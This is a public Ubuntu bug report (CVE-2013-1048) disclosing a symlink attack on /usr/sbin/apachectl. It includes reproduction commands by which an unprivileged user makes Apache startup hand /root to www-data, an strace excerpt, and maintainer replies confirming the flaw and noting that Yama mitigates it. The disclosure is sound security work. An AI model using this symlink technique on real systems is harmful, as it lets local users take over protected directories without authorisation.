/usr/sbin/apachectl privilege escalation

Bug #1104049 reported by Hayawardh Vijayakumar on 2013-01-24
Affects: apache2 (Ubuntu)
Importance: Low
Assigned to: Unassigned

Bug Description

Dear all,

The /usr/sbin/apachectl script allows unprivileged local users to change the permissions of any directory to 0755 and in addition make the user www-data its owner.

The script has a line:

start)
            ...
            install -d -o ${APACHE_RUN_USER:-www-data} ${APACHE_LOCK_DIR:-/var/lock/apache2}

Since in Ubuntu the /var/lock directory has world-writable permissions, a user can create a symbolic link to any directory. An administrator then starts Apache through /etc/init.d/apache2, which in turn calls the script /usr/sbin/apachectl which will change the permissions of the directory pointed to by the symbolic link to 0755 and in addition, make the user www-data its owner.

Details:
=====
root@u32d:~# apt-cache policy apache2.2-common
apache2.2-common:
  Installed: 2.2.22-1ubuntu1
  Candidate: 2.2.22-1ubuntu1.2
  Version table:
     2.2.22-1ubuntu1.2 0
        500 http://us.archive.ubuntu.com/ubuntu/ precise-updates/main i386 Packages
        500 http://security.ubuntu.com/ubuntu/ precise-security/main i386 Packages
 *** 2.2.22-1ubuntu1 0
        500 http://us.archive.ubuntu.com/ubuntu/ precise/main i386 Packages
        100 /var/lib/dpkg/status

root@u32d:~# lsb_release -rd
Description: Ubuntu 12.04 LTS
Release: 12.04

Steps to reproduce vulnerability on Ubuntu 12.04 LTS (also applicable to Quantal 12.10):

As an untrusted user, create a symbolic link in /var/lock to a directory the user does not have read/search permission (e.g., /root):

hayawardh@u32d:~$ ls -ld /root
drwx------. 14 root root 4096 Jan 24 08:23 /root

hayawardh@u32d:~$ cd /var/lock
hayawardh@u32d:/var/lock$ ln -s /root apache2

Wait for the administrator to start Apache

root@u32d:~# /etc/init.d/apache2 start
 * Starting web server apache2
apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1 for ServerName
   ...done.

Now check permissions of /root:
root@u32d:~# ls -ld /root
drwxr-xr-x. 14 www-data root 4096 Jan 24 08:23 /root

Fixing this does not seem straightforward because install opens the file to change permissions (in this case, /var/lock/apache2) without O_NOFOLLOW, and there does not seem to be a command line switch for the same.

Portion of strace output for install -d -o ${APACHE_RUN_USER:-www-data} ${APACHE_LOCK_DIR:-/var/lock/apache2}

mkdir("/var", 0755) = -1 EEXIST (File exists)
chdir("/var") = 0
mkdir("lock", 0755) = -1 EEXIST (File exists)
chdir("lock") = 0
mkdir("apache2", 0700) = -1 EEXIST (File exists)
open("apache2", O_RDONLY|O_NOCTTY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY) = 3
fstat64(3, {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
fchown32(3, 33, -1) = 0
fchmod(3, 0755) = 0
close(3) = 0

Thanks,
Hayawardh


Seth Arnold (seth-arnold) wrote :

Confirmed, 12.10 dmesg reports:

[ 1602.905898] non-matching-uid symlink following attempted in sticky world-writable directory by rm (fsuid 0 != 1000)
[ 1602.905907] non-matching-uid symlink following attempted in sticky world-writable directory by rm (fsuid 0 != 1000)
[ 1602.906352] non-matching-uid symlink following attempted in sticky world-writable directory by rm (fsuid 0 != 1000)
[ 1602.906355] non-matching-uid symlink following attempted in sticky world-writable directory by rm (fsuid 0 != 1000)

Thanks Hayawardh

Changed in apache2 (Ubuntu):
status: New → Confirmed
Marc Deslauriers (mdeslaur) wrote :

This is CVE-2013-1048

Seth Arnold (seth-arnold) wrote :

Hayawardh,

We've contacted the Debian security team, we're coordinating an update with them.

Thanks

Marc Deslauriers (mdeslaur) wrote :

On Ubuntu 10.10 and later this isn't an issue because of Yama symlink restrictions.
What version of Ubuntu did you try this on?

Hayawardh Vijayakumar wrote :

You are right. I had disabled Yama. In any case, would it be a problem for 10.04?

Thanks,
Hayawardh
On Jan 25, 2013 3:55 PM, "Marc Deslauriers" <email address hidden>
wrote:

> On Ubuntu 10.10 and later this isn't an issue because of Yama symlink
> restrictions.
> What version of Ubuntu did you try this on?

information type: Private Security → Public Security
Luke Faraone (lfaraone) on 2013-09-29
Changed in apache2 (Ubuntu):
importance: Undecided → Low